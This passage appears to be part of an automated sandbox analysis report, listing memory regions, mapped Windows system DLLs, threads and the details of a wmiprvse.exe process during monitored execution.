"c:\\windows\\system32\\drvstore.dll") Region: id = 2598 start_va = 0x7fffc35f0000 end_va = 0x7fffc3682fff monitored = 0 entry_point = 0x7fffc35f9e10 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 2599 start_va = 0x7fffc6740000 end_va = 0x7fffc6753fff monitored = 0 entry_point = 0x7fffc67428c0 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2600 start_va = 0x7fffc8120000 end_va = 0x7fffc8132fff monitored = 0 entry_point = 0x7fffc8123f60 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2601 start_va = 0x7fffc8f30000 end_va = 0x7fffc8f5efff monitored = 0 entry_point = 0x7fffc8f372e0 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 2602 start_va = 0x7fffc8f60000 end_va = 0x7fffc8ff2fff monitored = 0 entry_point = 0x7fffc8f68f80 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 2603 start_va = 0x7fffc92d0000 end_va = 0x7fffc9359fff monitored = 0 entry_point = 0x7fffc9315870 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 2604 start_va = 0x7fffc9590000 end_va = 0x7fffc95cafff monitored = 0 entry_point = 0x7fffc959a620 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 2605 start_va = 0x7fffc95e0000 end_va = 0x7fffc96a9fff monitored = 0 entry_point = 0x7fffc960bc80 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 2606 start_va = 0x7fffc9b80000 end_va = 0x7fffc9baafff monitored = 0 entry_point = 0x7fffc9b82db0 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 2607 start_va = 0x7fffc9f10000 end_va = 0x7fffc9f21fff monitored = 0 entry_point = 0x7fffc9f13e30 region_type = mapped_file name = "umpdc.dll" filename = "\\Windows\\System32\\umpdc.dll" (normalized: "c:\\windows\\system32\\umpdc.dll") Region: id = 2608 start_va = 0x7fffc9f30000 end_va = 0x7fffc9f7afff monitored = 0 entry_point = 0x7fffc9f33480 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2609 start_va = 0x7fffca030000 end_va = 0x7fffca05dfff monitored = 0 entry_point = 0x7fffca034f10 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2610 start_va = 0x7fffca220000 end_va = 0x7fffca26cfff monitored = 0 entry_point = 0x7fffca233280 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2611 start_va = 0x7fffca270000 end_va = 0x7fffca36ffff monitored = 0 entry_point = 0x7fffca285ac0 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 2612 start_va = 0x7fffca370000 end_va = 0x7fffca479fff monitored = 0 entry_point = 0x7fffca3a1300 region_type = mapped_file name = "gdi32full.dll" filename = "\\Windows\\System32\\gdi32full.dll" (normalized: "c:\\windows\\system32\\gdi32full.dll") Region: id = 2613 start_va = 0x7fffca480000 end_va = 0x7fffca4fefff monitored = 0 entry_point = 0x7fffca4b73e0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2614 start_va = 0x7fffca560000 end_va = 0x7fffca5fcfff monitored = 0 entry_point = 0x7fffca575390 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 2615 start_va = 0x7fffca600000 end_va = 0x7fffca75cfff monitored = 0 entry_point = 0x7fffca64efa0 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2616 start_va = 0x7fffca760000 end_va = 0x7fffca781fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "win32u.dll" filename = "\\Windows\\System32\\win32u.dll" (normalized: "c:\\windows\\system32\\win32u.dll") Region: id = 2617 start_va = 0x7fffca790000 end_va = 0x7fffcaa56fff monitored = 0 entry_point = 0x7fffca7a1bd0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2618 start_va = 0x7fffcaa60000 end_va = 0x7fffcaa86fff monitored = 0 entry_point = 0x7fffcaa68690 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2619 start_va = 0x7fffcad80000 end_va = 0x7fffcae2dfff monitored = 0 entry_point = 0x7fffcadbb940 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2620 start_va = 0x7fffcae30000 end_va = 0x7fffcb296fff monitored = 0 entry_point = 0x7fffcae53230 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 2621 start_va = 0x7fffcb2a0000 end_va = 0x7fffcb33afff monitored = 0 entry_point = 0x7fffcb2bc3e0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2622 start_va = 0x7fffcb350000 end_va = 0x7fffcb424fff monitored = 0 entry_point = 0x7fffcb36d190 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2623 start_va = 0x7fffcb440000 end_va = 0x7fffcb4fcfff monitored = 0 entry_point = 0x7fffcb457070 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2624 start_va = 0x7fffcb560000 end_va = 0x7fffcb5fdfff monitored = 0 entry_point = 0x7fffcb567850 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2625 start_va = 0x7fffcb600000 end_va = 0x7fffcb6a9fff monitored = 0 entry_point = 0x7fffcb615470 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2626 start_va = 0x7fffcb790000 end_va = 0x7fffcb798fff monitored = 0 entry_point = 0x7fffcb792020 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2627 start_va = 0x7fffcb7a0000 end_va = 0x7fffcb93ffff monitored = 0 entry_point = 0x7fffcb7b7a10 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2628 start_va = 0x7fffcbae0000 end_va = 0x7fffcbb87fff monitored = 0 entry_point = 0x7fffcbafd990 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2629 start_va = 0x7fffcbb90000 end_va = 0x7fffcbee3fff monitored = 0 entry_point = 0x7fffcbc81d00 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2630 start_va = 0x7fffcbef0000 end_va = 0x7fffcc018fff monitored = 0 entry_point = 0x7fffcbf16140 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2631 start_va = 0x7fffcc830000 end_va = 0x7fffcc952fff monitored = 0 entry_point = 0x7fffcc88da30 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2632 start_va = 0x7fffcc960000 end_va = 0x7fffcc989fff monitored = 0 entry_point = 0x7fffcc9648d0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2633 start_va = 0x7fffcca30000 end_va = 0x7fffccc23fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2636 start_va = 0x7fffc9000000 end_va = 0x7fffc9032fff monitored = 0 entry_point = 0x7fffc9006930 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2639 start_va = 0x4a0000 end_va = 0x4a3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msmplics.dll" filename = "\\Program Files\\Windows Defender\\MsMpLics.dll" (normalized: "c:\\program files\\windows defender\\msmplics.dll") Region: id = 2640 start_va = 0x7fffc8ac0000 end_va = 0x7fffc8ae2fff monitored = 0 entry_point = 0x7fffc8ac3700 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 2641 start_va = 0xd60000 end_va = 0xddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Region: id = 2642 start_va = 0x4a0000 end_va = 0x4a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 2643 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 2651 start_va = 0xde0000 end_va = 0x1117fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 231 os_tid = 0xd4c Thread: id = 232 os_tid = 0xea0 Thread: id = 233 os_tid = 0x718 Thread: id = 234 os_tid = 0xba4 Thread: id = 235 os_tid = 0x4ac Thread: id = 236 os_tid = 0x6bc Thread: id = 237 os_tid = 0xc8c Thread: id = 238 os_tid = 0xaa0 Process: id = "11" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x10c9b000" os_pid = "0x12bc" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0x310" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Local Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:00117552" [0xc000000f], "S-1-5-32-1488445330-856673777-1515413738-1380768593-2977925950-2228326386-886087428-2802422674" [0x7], "S-1-5-32-383293015-3350740429-1839969850-1819881064-1569454686-4198502490-78857879-1413643331" [0x7], "S-1-5-32-2035927579-283314533-3422103930-3587774809-765962649-3034203285-3544878962-607181067" [0x7], "S-1-5-32-3659434007-2290108278-1125199667-3679670526-1293081662-2164323352-1777701501-2595986263" [0x7], "S-1-5-32-11742800-2107441976-3443185924-4134956905-3840447964-3749968454-3843513199-670971053" [0x7], "S-1-5-32-3523901360-1745872541-794127107-675934034-1867954868-1951917511-1111796624-2052600462" [0x7] Region: id = 2850 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2851 start_va = 0x30000 end_va = 0x4cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2852 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2853 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2854 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2855 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2856 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2857 start_va = 0x7ffe0000 end_va = 0x7ffe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2858 start_va = 0x7ff5fffc0000 end_va = 0x7ff5fffc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffc0000" filename = "" Region: id = 2859 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 2860 start_va = 0x7ff708950000 end_va = 0x7ff7089cdfff monitored = 0 entry_point = 0x7ff708962580 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 2861 start_va = 0x7fffcca30000 end_va = 0x7fffccc23fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2862 start_va = 0x510000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2863 start_va = 0x7ff4fdf90000 end_va = 0x7ff5fdfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff4fdf90000" filename = "" Region: id = 2864 start_va = 0x7ff5fdfb0000 end_va = 0x7ff5fffb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff5fdfb0000" filename = "" Region: id = 2865 start_va = 0x7fffca790000 end_va = 0x7fffcaa56fff monitored = 0 entry_point = 0x7fffca7a1bd0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2866 start_va = 0x7fffcb440000 end_va = 0x7fffcb4fcfff monitored = 0 entry_point = 0x7fffcb457070 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2867 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2868 start_va = 0x7ff4fde90000 end_va = 0x7ff4fdf8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff4fde90000" filename = "" Region: id = 2869 start_va = 0x100000 end_va = 0x1c8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2870 start_va = 0x7fffcb560000 end_va = 0x7fffcb5fdfff monitored = 0 entry_point = 0x7fffcb567850 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2871 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2872 start_va = 0x7fffb4820000 end_va = 0x7fffb492afff monitored = 0 entry_point = 0x7fffb4855c10 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 2873 start_va = 0x7fffcbb90000 end_va = 0x7fffcbee3fff monitored = 0 entry_point = 0x7fffcbc81d00 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2874 start_va = 0x7fffca270000 end_va = 0x7fffca36ffff monitored = 0 entry_point = 0x7fffca285ac0 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 2875 start_va = 0x7fffcc830000 end_va = 0x7fffcc952fff monitored = 0 entry_point = 0x7fffcc88da30 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2876 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2877 start_va = 0x7fffb4300000 end_va = 0x7fffb4317fff monitored = 0 entry_point = 0x7fffb4305be0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 2878 start_va = 0x7fffbe330000 end_va = 0x7fffbe3b5fff monitored = 1 entry_point = 0x7fffbe345570 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 2879 start_va = 0x610000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2880 start_va = 0x1d0000 end_va = 0x1d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2881 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2882 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 2883 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 2884 start_va = 0x7fffcb600000 end_va = 0x7fffcb6a9fff monitored = 0 entry_point = 0x7fffcb615470 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2885 start_va = 0x7fffcb2a0000 end_va = 0x7fffcb33afff monitored = 0 entry_point = 0x7fffcb2bc3e0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2886 start_va = 0x760000 end_va = 0xa97fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2887 start_va = 0x7fffcb7a0000 end_va = 0x7fffcb93ffff monitored = 0 entry_point = 0x7fffcb7b7a10 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2888 start_va = 0x7fffca760000 end_va = 0x7fffca781fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "win32u.dll" filename = "\\Windows\\System32\\win32u.dll" (normalized: "c:\\windows\\system32\\win32u.dll") Region: id = 2889 start_va = 0x7fffcc960000 end_va = 0x7fffcc989fff monitored = 0 entry_point = 0x7fffcc9648d0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2890 start_va = 0x7fffca370000 end_va = 0x7fffca479fff monitored = 0 entry_point = 0x7fffca3a1300 region_type = mapped_file name = "gdi32full.dll" filename = "\\Windows\\System32\\gdi32full.dll" (normalized: "c:\\windows\\system32\\gdi32full.dll") Region: id = 2891 start_va = 0x7fffca560000 end_va = 0x7fffca5fcfff monitored = 0 entry_point = 0x7fffca575390 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 2892 start_va = 0x490000 end_va = 0x497fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 2893 start_va = 0x610000 end_va = 0x6d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2894 start_va = 0x750000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 2895 start_va = 0xaa0000 end_va = 0xc9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000aa0000" filename = "" Region: id = 2896 start_va = 0xca0000 end_va = 0xe20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ca0000" filename = "" Region: id = 2897 start_va = 0x4a0000 end_va = 0x4a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 2898 start_va = 0x4b0000 end_va = 0x4b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 2899 start_va = 0x4c0000 end_va = 0x4c4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 2900 start_va = 0xe30000 end_va = 0xf74fff monitored = 0 entry_point = 0xe8a9b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2901 start_va = 0x7fffc8120000 end_va = 0x7fffc8132fff monitored = 0 entry_point = 0x7fffc8123f60 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2902 start_va = 0x7fffca480000 end_va = 0x7fffca4fefff monitored = 0 entry_point = 0x7fffca4b73e0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2903 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 2904 start_va = 0xe30000 end_va = 0xeaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 2905 start_va = 0xeb0000 end_va = 0xfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000eb0000" filename = "" Region: id = 2906 start_va = 0x4e0000 end_va = 0x4e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 2907 start_va = 0x7fffcbae0000 end_va = 0x7fffcbb87fff monitored = 0 entry_point = 0x7fffcbafd990 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2908 start_va = 0x4f0000 end_va = 0x4f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 2909 start_va = 0x7fffb4d40000 end_va = 0x7fffb4d50fff monitored = 0 entry_point = 0x7fffb4d42aa0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2910 start_va = 0x7fffcc020000 end_va = 0x7fffcc08afff monitored = 0 entry_point = 0x7fffcc034300 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2911 start_va = 0x7fffcb350000 end_va = 0x7fffcb424fff monitored = 0 entry_point = 0x7fffcb36d190 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2912 start_va = 0xfb0000 end_va = 0x10d7fff monitored = 0 entry_point = 0xfd6140 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2913 start_va = 0xfb0000 end_va = 0x10f4fff monitored = 0 entry_point = 0x100a9b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2914 start_va = 0xfb0000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 2915 start_va = 0x1030000 end_va = 0x10affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 2916 start_va = 0x10b0000 end_va = 0x112ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 2917 start_va = 0x500000 end_va = 0x500fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 2918 start_va = 0x6e0000 end_va = 0x6e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 2919 start_va = 0x7fffb4780000 end_va = 0x7fffb4793fff monitored = 0 entry_point = 0x7fffb4781800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 2920 start_va = 0x1130000 end_va = 0x11affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001130000" filename = "" Region: id = 2921 start_va = 0x11b0000 end_va = 0x122ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 2922 start_va = 0x1230000 end_va = 0x12affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001230000" filename = "" Region: id = 2923 start_va = 0x7fffb4750000 end_va = 0x7fffb4777fff monitored = 0 entry_point = 0x7fffb4759440 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 2924 start_va = 0x7fff9fd10000 end_va = 0x7fff9fdbbfff monitored = 0 entry_point = 0x7fff9fd667b0 region_type = mapped_file name = "protectionmanagement.dll" filename = "\\Program Files\\Windows Defender\\ProtectionManagement.dll" (normalized: "c:\\program files\\windows defender\\protectionmanagement.dll") Region: id = 2925 start_va = 0x7fffcbef0000 end_va = 0x7fffcc018fff monitored = 0 entry_point = 0x7fffcbf16140 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2926 start_va = 0x7fffcc090000 end_va = 0x7fffcc7c0fff monitored = 0 entry_point = 0x7fffcc19e6e0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2927 start_va = 0x7fffcb970000 end_va = 0x7fffcb9c4fff monitored = 0 entry_point = 0x7fffcb97a7e0 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2928 start_va = 0x7fffca600000 end_va = 0x7fffca75cfff monitored = 0 entry_point = 0x7fffca64efa0 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2929 start_va = 0x7fffca500000 end_va = 0x7fffca55ffff monitored = 0 entry_point = 0x7fffca510380 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 2930 start_va = 0x7fffa3f90000 end_va = 0x7fffa4078fff monitored = 0 entry_point = 0x7fffa401be70 region_type = mapped_file name = "mpclient.dll" filename = "\\Program Files\\Windows Defender\\MpClient.dll" (normalized: 